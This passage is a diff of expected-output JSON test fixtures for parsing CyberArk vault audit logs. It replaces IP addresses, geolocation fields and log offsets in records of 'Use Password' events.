         "destination.user.name": "adrian",
         "event.action": "use password",
@@ -128,7 +123,7 @@
         "related.ip": [
             "127.0.0.1",
             "34.123.103.115",
-            "81.32.170.205"
+            "67.43.156.14"
         ],
         "related.user": [
             "Administrator",
@@ -154,11 +149,11 @@
         "cyberarkpas.audit.ca_properties.user_name": "adrian",
         "cyberarkpas.audit.desc": "Use Password",
         "cyberarkpas.audit.file": "Root\\Operating System-UnixSSHKeys-34.123.103.115-adrian",
-        "cyberarkpas.audit.gateway_station": "81.32.170.205",
+        "cyberarkpas.audit.gateway_station": "67.43.156.14",
         "cyberarkpas.audit.iso_timestamp": "2021-03-11T17:46:49Z",
         "cyberarkpas.audit.issuer": "Administrator",
         "cyberarkpas.audit.message": "Use Password",
-        "cyberarkpas.audit.raw": "<syslog>\n\n  <audit_record>\n    <Rfc5424>yes</Rfc5424>\n    <Timestamp>Mar 11 09:46:49</Timestamp>\n    <IsoTimestamp>2021-03-11T17:46:49Z</IsoTimestamp>\n    <Hostname>VAULT</Hostname>\n    <Vendor>Cyber-Ark</Vendor>\n    <Product>Vault</Product>\n    <Version>11.7.0000</Version>\n    <MessageID>308</MessageID>\n    <Desc>Use Password</Desc>\n    <Severity>Info</Severity>\n    <Issuer>Administrator</Issuer>\n    <Action>Use Password</Action>\n    <SourceUser></SourceUser>\n    <TargetUser></TargetUser>\n    <Safe>PSM</Safe>\n    <File>Root\\Operating System-UnixSSHKeys-34.123.103.115-adrian</File>\n    <Station>127.0.0.1</Station>\n    <Location></Location>\n    <Category></Category>\n    <RequestId></RequestId>\n    <Reason>FOR FUN.</Reason>\n    <ExtraDetails></ExtraDetails>\n    <Message>Use Password</Message>\n    <GatewayStation>81.32.170.205</GatewayStation>\n    <CAProperties>\n      <CAProperty Name=\"PolicyID\" Value=\"UnixSSHKeys\"></CAProperty>\n      <CAProperty Name=\"UserName\" Value=\"adrian\"></CAProperty>\n      <CAProperty Name=\"Address\" Value=\"34.123.103.115\"></CAProperty>\n      <CAProperty Name=\"CreationMethod\" Value=\"PVWA\"></CAProperty>\n      <CAProperty Name=\"DeviceType\" Value=\"Operating System\"></CAProperty>\n    </CAProperties>\n  </audit_record>\n\n</syslog>",
+        "cyberarkpas.audit.raw": "<syslog>\n\n  <audit_record>\n    <Rfc5424>yes</Rfc5424>\n    <Timestamp>Mar 11 09:46:49</Timestamp>\n    <IsoTimestamp>2021-03-11T17:46:49Z</IsoTimestamp>\n    <Hostname>VAULT</Hostname>\n    <Vendor>Cyber-Ark</Vendor>\n    <Product>Vault</Product>\n    <Version>11.7.0000</Version>\n    <MessageID>308</MessageID>\n    <Desc>Use Password</Desc>\n    <Severity>Info</Severity>\n    <Issuer>Administrator</Issuer>\n    <Action>Use Password</Action>\n    <SourceUser></SourceUser>\n    <TargetUser></TargetUser>\n    <Safe>PSM</Safe>\n    <File>Root\\Operating System-UnixSSHKeys-34.123.103.115-adrian</File>\n    <Station>127.0.0.1</Station>\n    <Location></Location>\n    <Category></Category>\n    <RequestId></RequestId>\n    <Reason>FOR FUN.</Reason>\n    <ExtraDetails></ExtraDetails>\n    <Message>Use Password</Message>\n    <GatewayStation>67.43.156.14</GatewayStation>\n    <CAProperties>\n      <CAProperty Name=\"PolicyID\" Value=\"UnixSSHKeys\"></CAProperty>\n      <CAProperty Name=\"UserName\" Value=\"adrian\"></CAProperty>\n      <CAProperty Name=\"Address\" Value=\"34.123.103.115\"></CAProperty>\n      <CAProperty Name=\"CreationMethod\" Value=\"PVWA\"></CAProperty>\n      <CAProperty Name=\"DeviceType\" Value=\"Operating System\"></CAProperty>\n    </CAProperties>\n  </audit_record>\n\n</syslog>",
         "cyberarkpas.audit.reason": "FOR FUN.",
         "cyberarkpas.audit.rfc5424": true,
         "cyberarkpas.audit.safe": "PSM",
@@ -166,11 +161,6 @@
         "cyberarkpas.audit.station": "127.0.0.1",
         "cyberarkpas.audit.timestamp": "Mar 11 09:46:49",
         "destination.address": "34.123.103.115",
-        "destination.geo.continent_name": "North America",
-        "destination.geo.country_iso_code": "US",
-        "destination.geo.country_name": "United States",
-        "destination.geo.location.lat": 37.751,
-        "destination.geo.location.lon": -97.822,
         "destination.ip": "34.123.103.115",
         "destination.user.name": "adrian",
         "event.action": "use password",
@@ -192,7 +182,7 @@
         "fileset.name": "audit",
         "host.name": "VAULT",
         "input.type": "log",
-        "log.offset": 5109,
+        "log.offset": 5107,
         "log.syslog.priority": "5",
         "network.direction": "outbound",
         "observer.hostname": "VAULT",
@@ -202,7 +192,7 @@
         "related.ip": [
             "127.0.0.1",
             "34.123.103.115",
-            "81.32.170.205"
+            "67.43.156.14"
         ],
         "related.user": [
             "Administrator",
@@ -228,11 +218,11 @@
         "cyberarkpas.audit.ca_properties.user_name": "adrian",
         "cyberarkpas.audit.desc": "Use Password",
         "cyberarkpas.audit.file": "Root\\Operating System-UnixSSHKeys-34.123.103.115-adrian",
-        "cyberarkpas.audit.gateway_station": "81.32.170.205",
+        "cyberarkpas.audit.gateway_station": "67.43.156.14",
         "cyberarkpas.audit.iso_timestamp": "2021-03-11T17:48:27Z",
         "cyberarkpas.audit.issuer": "Administrator",
         "cyberarkpas.audit.message": "Use Password",
-        "cyberarkpas.audit.raw": "<syslog>\n\n  <audit_record>\n    <Rfc5424>yes</Rfc5424>\n    <Timestamp>Mar 11 09:48:27</Timestamp>\n    <IsoTimestamp>2021-03-11T17:48:27Z</IsoTimestamp>\n    <Hostname>VAULT</Hostname>\n    <Vendor>Cyber-Ark</Vendor>\n    <Product>Vault</Product>\n    <Version>11.7.0000</Version>\n    <MessageID>308</MessageID>\n    <Desc>Use Password</Desc>\n    <Severity>Info</Severity>\n    <Issuer>Administrator</Issuer>\n    <Action>Use Password</Action>\n    <SourceUser></SourceUser>\n    <TargetUser></TargetUser>\n    <Safe>PSM</Safe>\n    <File>Root\\Operating System-UnixSSHKeys-34.123.103.115-adrian</File>\n    <Station>10.0.2.2</Station>\n    <Location></Location>\n    <Category></Category>\n    <RequestId></RequestId>\n    <Reason>For fun and profit</Reason>\n    <ExtraDetails></ExtraDetails>\n    <Message>Use Password</Message>\n    <GatewayStation>81.32.170.205</GatewayStation>\n    <CAProperties>\n      <CAProperty Name=\"PolicyID\" Value=\"UnixSSHKeys\"></CAProperty>\n      <CAProperty Name=\"UserName\" Value=\"adrian\"></CAProperty>\n      <CAProperty Name=\"Address\" Value=\"34.123.103.115\"></CAProperty>\n      <CAProperty Name=\"CreationMethod\" Value=\"PVWA\"></CAProperty>\n      <CAProperty Name=\"DeviceType\" Value=\"Operating System\"></CAProperty>\n    </CAProperties>\n  </audit_record>\n\n</syslog>",
+        "cyberarkpas.audit.raw": "<syslog>\n\n  <audit_record>\n    <Rfc5424>yes</Rfc5424>\n    <Timestamp>Mar 11 09:48:27</Timestamp>\n    <IsoTimestamp>2021-03-11T17:48:27Z</IsoTimestamp>\n    <Hostname>VAULT</Hostname>\n    <Vendor>Cyber-Ark</Vendor>\n    <Product>Vault</Product>\n    <Version>11.7.0000</Version>\n    <MessageID>308</MessageID>\n    <Desc>Use Password</Desc>\n    <Severity>Info</Severity>\n    <Issuer>Administrator</Issuer>\n    <Action>Use Password</Action>\n    <SourceUser></SourceUser>\n    <TargetUser></TargetUser>\n    <Safe>PSM</Safe>\n    <File>Root\\Operating System-UnixSSHKeys-34.123.103.115-adrian</File>\n    <Station>10.0.2.2</Station>\n    <Location></Location>\n    <Category></Category>\n    <RequestId></RequestId>\n    <Reason>For fun and profit</Reason>\n    <ExtraDetails></ExtraDetails>\n    <Message>Use Password</Message>\n    <GatewayStation>67.43.156.14</GatewayStation>\n    <CAProperties>\n      <CAProperty Name=\"PolicyID\" Value=\"UnixSSHKeys\"></CAProperty>\n      <CAProperty Name=\"UserName\" Value=\"adrian\"></CAProperty>\n      <CAProperty Name=\"Address\" Value=\"34.123.103.115\"></CAProperty>\n      <CAProperty Name=\"CreationMethod\" Value=\"PVWA\"></CAProperty>\n      <CAProperty Name=\"DeviceType\" Value=\"Operating System\"></CAProperty>\n    </CAProperties>\n  </audit_record>\n\n</syslog>",
         "cyberarkpas.audit.reason": "For fun and profit",
         "cyberarkpas.audit.rfc5424": true,
         "cyberarkpas.audit.safe": "PSM",
@@ -240,11 +230,6 @@
         "cyberarkpas.audit.station": "10.0.2.2",
         "cyberarkpas.audit.timestamp": "Mar 11 09:48:27",
         "destination.address": "34.123.103.115",
-        "destination.geo.continent_name": "North America",
-        "destination.geo.country_iso_code": "US",
-        "destination.geo.country_name": "United States",
-        "destination.geo.location.lat": 37.751,
-        "destination.geo.location.lon": -97.822,
         "destination.ip": "34.123.103.115",
         "destination.user.name": "adrian",
         "event.action": "use password",
@@ -266,7 +251,7 @@
         "fileset.name": "audit",
         "host.name": "VAULT",
         "input.type": "log",
-        "log.offset": 7323,
+        "log.offset": 7319,
         "log.syslog.priority": "5",
         "network.direction": "outbound",
         "observer.hostname": "VAULT",
@@ -276,7 +261,7 @@
         "related.ip": [
             "10.0.2.2",
             "34.123.103.115",
-            "81.32.170.205"
+            "67.43.156.14"
         ],
         "related.user": [
             "Administrator",
@@ -302,11 +287,11 @@
         "cyberarkpas.audit.ca_properties.user_name": "adrian",
         "cyberarkpas.audit.desc": "Use Password",
         "cyberarkpas.audit.file": "Root\\Operating System-UnixSSHKeys-34.123.103.115-adrian",
-        "cyberarkpas.audit.gateway_station": "81.32.170.205",
+        "cyberarkpas.audit.gateway_station": "67.43.156.14",
         "cyberarkpas.audit.iso_timestamp": "2021-03-11T17:54:49Z",
         "cyberarkpas.audit.issuer": "Administrator",
         "cyberarkpas.audit.message": "Use Password",
-        "cyberarkpas.audit.raw": "<syslog>\n\n  <audit_record>\n    <Rfc5424>yes</Rfc5424>\n    <Timestamp>Mar 11 09:54:49</Timestamp>\n    <IsoTimestamp>2021-03-11T17:54:49Z</IsoTimestamp>\n    <Hostname>VAULT</Hostname>\n    <Vendor>Cyber-Ark</Vendor>\n    <Product>Vault</Product>\n    <Version>11.7.0000</Version>\n    <MessageID>308</MessageID>\n    <Desc>Use Password</Desc>\n    <Severity>Info</Severity>\n    <Issuer>Administrator</Issuer>\n    <Action>Use Password</Action>\n    <SourceUser></SourceUser>\n    <TargetUser></TargetUser>\n    <Safe>PSM</Safe>\n    <File>Root\\Operating System-UnixSSHKeys-34.123.103.115-adrian</File>\n    <Station>10.0.2.2</Station>\n    <Location></Location>\n    <Category></Category>\n    <RequestId></RequestId>\n    <Reason>Because I say so</Reason>\n    <ExtraDetails></ExtraDetails>\n    <Message>Use Password</Message>\n    <GatewayStation>81.32.170.205</GatewayStation>\n    <CAProperties>\n      <CAProperty Name=\"PolicyID\" Value=\"UnixSSHKeys\"></CAProperty>\n      <CAProperty Name=\"UserName\" Value=\"adrian\"></CAProperty>\n      <CAProperty Name=\"Address\" Value=\"34.123.103.115\"></CAProperty>\n      <CAProperty Name=\"CreationMethod\" Value=\"PVWA\"></CAProperty>\n      <CAProperty Name=\"DeviceType\" Value=\"Operating System\"></CAProperty>\n    </CAProperties>\n  </audit_record>\n\n</syslog>",
+        "cyberarkpas.audit.raw": "<syslog>\n\n  <audit_record>\n    <Rfc5424>yes</Rfc5424>\n    <Timestamp>Mar 11 09:54:49</Timestamp>\n    <IsoTimestamp>2021-03-11T17:54:49Z</IsoTimestamp>\n    <Hostname>VAULT</Hostname>\n    <Vendor>Cyber-Ark</Vendor>\n    <Product>Vault</Product>\n    <Version>11.7.0000</Version>\n    <MessageID>308</MessageID>\n    <Desc>Use Password</Desc>\n    <Severity>Info</Severity>\n    <Issuer>Administrator</Issuer>\n    <Action>Use Password</Action>\n    <SourceUser></SourceUser>\n    <TargetUser></TargetUser>\n    <Safe>PSM</Safe>\n    <File>Root\\Operating System-UnixSSHKeys-34.123.103.115-adrian</File>\n    <Station>10.0.2.2</Station>\n    <Location></Location>\n    <Category></Category>\n    <RequestId></RequestId>\n    <Reason>Because I say so</Reason>\n    <ExtraDetails></ExtraDetails>\n    <Message>Use Password</Message>\n    <GatewayStation>67.43.156.14</GatewayStation>\n    <CAProperties>\n      <CAProperty Name=\"PolicyID\" Value=\"UnixSSHKeys\"></CAProperty>\n      <CAProperty Name=\"UserName\" Value=\"adrian\"></CAProperty>\n      <CAProperty Name=\"Address\" Value=\"34.123.103.115\"></CAProperty>\n      <CAProperty Name=\"CreationMethod\" Value=\"PVWA\"></CAProperty>\n      <CAProperty Name=\"DeviceType\" Value=\"Operating System\"></CAProperty>\n    </CAProperties>\n  </audit_record>\n\n</syslog>",
         "cyberarkpas.audit.reason": "Because I say so",
         "cyberarkpas.audit.rfc5424": true,
         "cyberarkpas.audit.safe": "PSM",
@@ -314,11 +299,6 @@
         "cyberarkpas.audit.station": "10.0.2.2",
         "cyberarkpas.audit.timestamp": "Mar 11 09:54:49",
         "destination.address": "34.123.103.115",
-        "destination.geo.continent_name": "North America",
-        "destination.geo.country_iso_code": "US",
-        "destination.geo.country_name": "United States",
-        "destination.geo.location.lat": 37.751,
-        "destination.geo.location.lon": -97.822,
         "destination.ip": "34.123.103.115",
         "destination.user.name": "adrian",
         "event.action": "use password",
@@ -340,7 +320,7 @@
         "fileset.name": "audit",
         "host.name": "VAULT",
         "input.type": "log",
-        "log.offset": 9555,
+        "log.offset": 9549,
         "log.syslog.priority": "5",
         "network.direction": "outbound",
         "observer.hostname": "VAULT",
@@ -350,7 +330,7 @@
         "related.ip": [
             "10.0.2.2",
             "34.123.103.115",
-            "81.32.170.205"
+            "67.43.156.14"
         ],
         "related.user": [
             "Administrator",
@@ -376,11 +356,11 @@
         "cyberarkpas.audit.ca_properties.user_name": "adrian",
         "cyberarkpas.audit.desc": "Use Password",
         "cyberarkpas.audit.file": "Root\\Operating System-UnixSSHKeys-34.123.103.115-adrian",
-        "cyberarkpas.audit.gateway_station": "81.32.170.205",
+        "cyberarkpas.audit.gateway_station": "67.43.156.14",
         "cyberarkpas.audit.iso_timestamp": "2021-03-11T17:56:30Z",
         "cyberarkpas.audit.issuer": "Administrator",
         "cyberarkpas.audit.message": "Use Password",
-        "cyberarkpas.audit.raw": "<syslog>\n\n  <audit_record>\n    <Rfc5424>yes</Rfc5424>\n    <Timestamp>Mar 11 09:56:30</Timestamp>\n    <IsoTimestamp>2021-03-11T17:56:30Z</IsoTimestamp>\n    <Hostname>VAULT</Hostname>\n    <Vendor>Cyber-Ark</Vendor>\n    <Product>Vault</Product>\n    <Version>11.7.0000</Version>\n    <MessageID>308</MessageID>\n    <Desc>Use Password</Desc>\n    <Severity>Info</Severity>\n    <Issuer>Administrator</Issuer>\n    <Action>Use Password</Action>\n    <SourceUser></SourceUser>\n    <TargetUser></TargetUser>\n    <Safe>PSM</Safe>\n    <File>Root\\Operating System-UnixSSHKeys-34.123.103.115-adrian</File>\n    <Station>10.0.2.2</Station>\n    <Location></Location>\n    <Category></Category>\n    <RequestId></RequestId>\n    <Reason>for fun</Reason>\n    <ExtraDetails></ExtraDetails>\n    <Message>Use Password</Message>\n    <GatewayStation>81.32.170.205</GatewayStation>\n    <CAProperties>\n      <CAProperty Name=\"PolicyID\" Value=\"UnixSSHKeys\"></CAProperty>\n      <CAProperty Name=\"UserName\" Value=\"adrian\"></CAProperty>\n      <CAProperty Name=\"Address\" Value=\"34.123.103.115\"></CAProperty>\n      <CAProperty Name=\"CreationMethod\" Value=\"PVWA\"></CAProperty>\n      <CAProperty Name=\"DeviceType\" Value=\"Operating System\"></CAProperty>\n    </CAProperties>\n  </audit_record>\n\n</syslog>",
+        "cyberarkpas.audit.raw": "<syslog>\n\n  <audit_record>\n    <Rfc5424>yes</Rfc5424>\n    <Timestamp>Mar 11 09:56:30</Timestamp>\n    <IsoTimestamp>2021-03-11T17:56:30Z</IsoTimestamp>\n    <Hostname>VAULT</Hostname>\n    <Vendor>Cyber-Ark</Vendor>\n    <Product>Vault</Product>\n    <Version>11.7.0000</Version>\n    <MessageID>308</MessageID>\n    <Desc>Use Password</Desc>\n    <Severity>Info</Severity>\n    <Issuer>Administrator</Issuer>\n    <Action>Use Password</Action>\n    <SourceUser></SourceUser>\n    <TargetUser></TargetUser>\n    <Safe>PSM</Safe>\n    <File>Root\\Operating System-UnixSSHKeys-34.123.103.115-adrian</File>\n    <Station>10.0.2.2</Station>\n    <Location></Location>\n    <Category></Category>\n    <RequestId></RequestId>\n    <Reason>for fun</Reason>\n    <ExtraDetails></ExtraDetails>\n    <Message>Use Password</Message>\n    <GatewayStation>67.43.156.14</GatewayStation>\n    <CAProperties>\n      <CAProperty Name=\"PolicyID\" Value=\"UnixSSHKeys\"></CAProperty>\n      <CAProperty Name=\"UserName\" Value=\"adrian\"></CAProperty>\n      <CAProperty Name=\"Address\" Value=\"34.123.103.115\"></CAProperty>\n      <CAProperty Name=\"CreationMethod\" Value=\"PVWA\"></CAProperty>\n      <CAProperty Name=\"DeviceType\" Value=\"Operating System\"></CAProperty>\n    </CAProperties>\n  </audit_record>\n\n</syslog>",
         "cyberarkpas.audit.reason": "for fun",
         "cyberarkpas.audit.rfc5424": true,
         "cyberarkpas.audit.safe": "PSM",
@@ -388,11 +368,6 @@
         "cyberarkpas.audit.station": "10.0.2.2",
         "cyberarkpas.audit.timestamp": "Mar 11 09:56:30",
         "destination.address": "34.123.103.115",
-        "destination.geo.continent_name": "North America",
-        "destination.geo.country_iso_code": "US",
-        "destination.geo.country_name": "United States",
-        "destination.geo.location.lat": 37.751,
-        "destination.geo.location.lon": -97.822,
         "destination.ip": "34.123.103.115",
         "destination.user.name": "adrian",
         "event.action": "use password",
@@ -414,7 +389,7 @@
         "fileset.name": "audit",
         "host.name": "VAULT",
         "input.type": "log",
-        "log.offset": 11783,
+        "log.offset": 11775,
         "log.syslog.priority": "5",
         "network.direction": "outbound",
         "observer.hostname": "VAULT",
@@ -424,7 +399,7 @@
         "related.ip": [
             "10.0.2.2",
             "34.123.103.115",
-            "81.32.170.205"
+            "67.43.156.14"
         ],
         "related.user": [
             "Administrator",
@@ -450,11 +425,11 @@
         "cyberarkpas.audit.ca_properties.user_name": "adrian",
         "cyberarkpas.audit.desc": "Use Password",
         "cyberarkpas.audit.file": "Root\\Operating System-UnixSSHKeys-34.123.103.115-adrian",
-        "cyberarkpas.audit.gateway_station": "81.32.170.205",
+        "cyberarkpas.audit.gateway_station": "67.43.156.14",
         "cyberarkpas.audit.iso_timestamp": "2021-03-11T20:23:17Z",
         "cyberarkpas.audit.issuer": "Administrator",
         "cyberarkpas.audit.message": "Use Password",
-        "cyberarkpas.audit.raw": "<syslog>\n\n  <audit_record>\n    <Rfc5424>yes</Rfc5424>\n    <Timestamp>Mar 11 12:23:17</Timestamp>\n    <IsoTimestamp>2021-03-11T20:23:17Z</IsoTimestamp>\n    <Hostname>VAULT</Hostname>\n    <Vendor>Cyber-Ark</Vendor>\n    <Product>Vault</Product>\n    <Version>11.7.0000</Version>\n    <MessageID>308</MessageID>\n    <Desc>Use Password</Desc>\n    <Severity>Info</Severity>\n    <Issuer>Administrator</Issuer>\n    <Action>Use Password</Action>\n    <SourceUser></SourceUser>\n    <TargetUser></TargetUser>\n    <Safe>PSM</Safe>\n    <File>Root\\Operating System-UnixSSHKeys-34.123.103.115-adrian</File>\n    <Station>10.0.2.2</Station>\n    <Location></Location>\n    <Category></Category>\n    <RequestId></RequestId>\n    <Reason>testing</Reason>\n    <ExtraDetails></ExtraDetails>\n    <Message>Use Password</Message>\n    <GatewayStation>81.32.170.205</GatewayStation>\n    <CAProperties>\n      <CAProperty Name=\"PolicyID\" Value=\"UnixSSHKeys\"></CAProperty>\n      <CAProperty Name=\"UserName\" Value=\"adrian\"></CAProperty>\n      <CAProperty Name=\"Address\" Value=\"34.123.103.115\"></CAProperty>\n      <CAProperty Name=\"CreationMethod\" Value=\"PVWA\"></CAProperty>\n      <CAProperty Name=\"DeviceType\" Value=\"Operating System\"></CAProperty>\n    </CAProperties>\n  </audit_record>\n\n</syslog>",
+        "cyberarkpas.audit.raw": "<syslog>\n\n  <audit_record>\n    <Rfc5424>yes</Rfc5424>\n    <Timestamp>Mar 11 12:23:17</Timestamp>\n    <IsoTimestamp>2021-03-11T20:23:17Z</IsoTimestamp>\n    <Hostname>VAULT</Hostname>\n    <Vendor>Cyber-Ark</Vendor>\n    <Product>Vault</Product>\n    <Version>11.7.0000</Version>\n    <MessageID>308</MessageID>\n    <Desc>Use Password</Desc>\n    <Severity>Info</Severity>\n    <Issuer>Administrator</Issuer>\n    <Action>Use Password</Action>\n    <SourceUser></SourceUser>\n    <TargetUser></TargetUser>\n    <Safe>PSM</Safe>\n    <File>Root\\Operating System-UnixSSHKeys-34.123.103.115-adrian</File>\n    <Station>10.0.2.2</Station>\n    <Location></Location>\n    <Category></Category>\n    <RequestId></RequestId>\n    <Reason>testing</Reason>\n    <ExtraDetails></ExtraDetails>\n    <Message>Use Password</Message>\n    <GatewayStation>67.43.156.14</GatewayStation>\n    <CAProperties>\n      <CAProperty Name=\"PolicyID\" Value=\"UnixSSHKeys\"></CAProperty>\n      <CAProperty Name=\"UserName\" Value=\"adrian\"></CAProperty>\n      <CAProperty Name=\"Address\" Value=\"34.123.103.115\"></CAProperty>\n      <CAProperty Name=\"CreationMethod\" Value=\"PVWA\"></CAProperty>\n      <CAProperty Name=\"DeviceType\" Value=\"Operating System\"></CAProperty>\n    </CAProperties>\n  </audit_record>\n\n</syslog>",
         "cyberarkpas.audit.reason": "testing",
         "cyberarkpas.audit.rfc5424": true,
         "cyberarkpas.audit.safe": "PSM",
@@ -462,11 +437,6 @@
         "cyberarkpas.audit.station": "10.0.2.2",
         "cyberarkpas.audit.timestamp": "Mar 11 12:23:17",
         "destination.address": "34.123.103.115",
-        "destination.geo.continent_name": "North America",
-        "destination.geo.country_iso_code": "US",
-        "destination.geo.country_name": "United States",
-        "destination.geo.location.lat": 37.751,
-        "destination.geo.location.lon": -97.822,
         "destination.ip": "34.123.103.115",
         "destination.user.name": "adrian",
         "event.action": "use password",
@@ -488,7 +458,7 @@
         "fileset.name": "audit",
         "host.name": "VAULT",
         "input.type": "log",
-        "log.offset": 13993,
+        "log.offset": 13983,
         "log.syslog.priority": "5",
         "network.direction": "outbound",
         "observer.hostname": "VAULT",
@@ -498,7 +468,7 @@
         "related.ip": [
             "10.0.2.2",
             "34.123.103.115",
-            "81.32.170.205"
+            "67.43.156.14"
         ],
         "related.user": [
             "Administrator",
@@ -530,22 +500,17 @@
         "cyberarkpas.audit.ca_properties.user_name": "testark",
         "cyberarkpas.audit.desc": "Use Password",
         "cyberarkpas.audit.file": "Root\\Operating System-UnixSSH-34.123.103.115-testark",
-        "cyberarkpas.audit.gateway_station": "34.71.250.247",
+        "cyberarkpas.audit.gateway_station": "81.2.69.143",
         "cyberarkpas.audit.iso_timestamp": "2021-03-14T13:49:35Z",
         "cyberarkpas.audit.issuer": "Administrator",
         "cyberarkpas.audit.message": "Use Password",
-        "cyberarkpas.audit.raw": "<syslog>\n\n  <audit_record>\n    <Rfc5424>yes</Rfc5424>\n    <Timestamp>Mar 14 06:49:35</Timestamp>\n    <IsoTimestamp>2021-03-14T13:49:35Z</IsoTimestamp>\n    <Hostname>VAULT</Hostname>\n    <Vendor>Cyber-Ark</Vendor>\n    <Product>Vault</Product>\n    <Version>11.7.0000</Version>\n    <MessageID>308</MessageID>\n    <Desc>Use Password</Desc>\n    <Severity>Info</Severity>\n    <Issuer>Administrator</Issuer>\n    <Action>Use Password</Action>\n    <SourceUser></SourceUser>\n    <TargetUser></TargetUser>\n    <Safe>partner</Safe>\n    <File>Root\\Operating System-UnixSSH-34.123.103.115-testark</File>\n    <Station>81.32.170.205</Station>\n    <Location></Location>\n    <Category></Category>\n    <RequestId></RequestId>\n    <Reason></Reason>\n    <ExtraDetails></ExtraDetails>\n    <Message>Use Password</Message>\n    <GatewayStation>34.71.250.247</GatewayStation>\n    <CAProperties>\n      <CAProperty Name=\"PolicyID\" Value=\"UnixSSH\"></CAProperty>\n      <CAProperty Name=\"UserName\" Value=\"testark\"></CAProperty>\n      <CAProperty Name=\"Address\" Value=\"34.123.103.115\"></CAProperty>\n      <CAProperty Name=\"ResetImmediately\" Value=\"ReconcileTask\"></CAProperty>\n      <CAProperty Name=\"CPMStatus\" Value=\"failure\"></CAProperty>\n      <CAProperty Name=\"RetriesCount\" Value=\"0\"></CAProperty>\n      <CAProperty Name=\"LastFailDate\" Value=\"1615729572\"></CAProperty>\n      <CAProperty Name=\"LastTask\" Value=\"ReconcileTask\"></CAProperty>\n      <CAProperty Name=\"CPMErrorDetails\" Value=\"First login - Reconcile account is not set or password is empty. Please link reconcile account to the target account or set the password. code: 8031\"></CAProperty>\n      <CAProperty Name=\"CreationMethod\" Value=\"PVWA\"></CAProperty>\n      <CAProperty Name=\"DeviceType\" Value=\"Operating System\"></CAProperty>\n    </CAProperties>\n  </audit_record>\n\n</syslog>",
+        "cyberarkpas.audit.raw": "<syslog>\n\n  <audit_record>\n    <Rfc5424>yes</Rfc5424>\n    <Timestamp>Mar 14 06:49:35</Timestamp>\n    <IsoTimestamp>2021-03-14T13:49:35Z</IsoTimestamp>\n    <Hostname>VAULT</Hostname>\n    <Vendor>Cyber-Ark</Vendor>\n    <Product>Vault</Product>\n    <Version>11.7.0000</Version>\n    <MessageID>308</MessageID>\n    <Desc>Use Password</Desc>\n    <Severity>Info</Severity>\n    <Issuer>Administrator</Issuer>\n    <Action>Use Password</Action>\n    <SourceUser></SourceUser>\n    <TargetUser></TargetUser>\n    <Safe>partner</Safe>\n    <File>Root\\Operating System-UnixSSH-34.123.103.115-testark</File>\n    <Station>67.43.156.14</Station>\n    <Location></Location>\n    <Category></Category>\n    <RequestId></RequestId>\n    <Reason></Reason>\n    <ExtraDetails></ExtraDetails>\n    <Message>Use Password</Message>\n    <GatewayStation>81.2.69.143</GatewayStation>\n    <CAProperties>\n      <CAProperty Name=\"PolicyID\" Value=\"UnixSSH\"></CAProperty>\n      <CAProperty Name=\"UserName\" Value=\"testark\"></CAProperty>\n      <CAProperty Name=\"Address\" Value=\"34.123.103.115\"></CAProperty>\n      <CAProperty Name=\"ResetImmediately\" Value=\"ReconcileTask\"></CAProperty>\n      <CAProperty Name=\"CPMStatus\" Value=\"failure\"></CAProperty>\n      <CAProperty Name=\"RetriesCount\" Value=\"0\"></CAProperty>\n      <CAProperty Name=\"LastFailDate\" Value=\"1615729572\"></CAProperty>\n      <CAProperty Name=\"LastTask\" Value=\"ReconcileTask\"></CAProperty>\n      <CAProperty Name=\"CPMErrorDetails\" Value=\"First login - Reconcile account is not set or password is empty. Please link reconcile account to the target account or set the password. code: 8031\"></CAProperty>\n      <CAProperty Name=\"CreationMethod\" Value=\"PVWA\"></CAProperty>\n      <CAProperty Name=\"DeviceType\" Value=\"Operating System\"></CAProperty>\n    </CAProperties>\n  </audit_record>\n\n</syslog>",
         "cyberarkpas.audit.rfc5424": true,
         "cyberarkpas.audit.safe": "partner",
         "cyberarkpas.audit.severity": "Info",
-        "cyberarkpas.audit.station": "81.32.170.205",
+        "cyberarkpas.audit.station": "67.43.156.14",
         "cyberarkpas.audit.timestamp": "Mar 14 06:49:35",
         "destination.address": "34.123.103.115",
-        "destination.geo.continent_name": "North America",
-        "destination.geo.country_iso_code": "US",
-        "destination.geo.country_name": "United States",
-        "destination.geo.location.lat": 37.751,
-        "destination.geo.location.lon": -97.822,
         "destination.ip": "34.123.103.115",
         "destination.user.name": "testark",
         "event.action": "use password",
@@ -567,7 +532,7 @@
         "fileset.name": "audit",
         "host.name": "VAULT",
         "input.type": "log",
-        "log.offset": 16203,
+        "log.offset": 16191,
         "log.syslog.priority": "5",
         "network.direction": "external",
         "observer.hostname": "VAULT",
@@ -576,24 +541,21 @@
         "observer.version": "11.7.0000",
         "related.ip": [
             "34.123.103.115",
-            "34.71.250.247",
-            "81.32.170.205"
+            "67.43.156.14",
+            "81.2.69.143"
         ],
         "related.user": [
             "Administrator",
             "testark"
         ],
         "service.type": "cyberarkpas",
-        "source.address": "81.32.170.205",
-        "source.geo.city_name": "Barcelona",
-        "source.geo.continent_name": "Europe",
-        "source.geo.country_iso_code": "ES",
-        "source.geo.country_name": "Spain",
-        "source.geo.location.lat": 41.3891,
-        "source.geo.location.lon": 2.1611,
-        "source.geo.region_iso_code": "ES-B",
-        "source.geo.region_name": "Barcelona",
-        "source.ip": "81.32.170.205",
+        "source.address": "67.43.156.14",
+        "source.geo.continent_name": "Asia",
+        "source.geo.country_iso_code": "BT",
+        "source.geo.country_name": "Bhutan",
+        "source.geo.location.lat": 27.5,
+        "source.geo.location.lon": 90.5,
+        "source.ip": "67.43.156.14",
         "source.user.name": "Administrator",
         "tags": [
             "cyberarkpas.audit",
@@ -615,22 +577,17 @@
         "cyberarkpas.audit.ca_properties.user_name": "testark",
         "cyberarkpas.audit.desc": "Use Password",
         "cyberarkpas.audit.file": "Root\\Operating System-UnixSSH-34.123.103.115-testark",
-        "cyberarkpas.audit.gateway_station": "34.71.250.247",
+        "cyberarkpas.audit.gateway_station": "81.2.69.143",
         "cyberarkpas.audit.iso_timestamp": "2021-03-15T10:31:54Z",
         "cyberarkpas.audit.issuer": "Administrator",
         "cyberarkpas.audit.message": "Use Password",
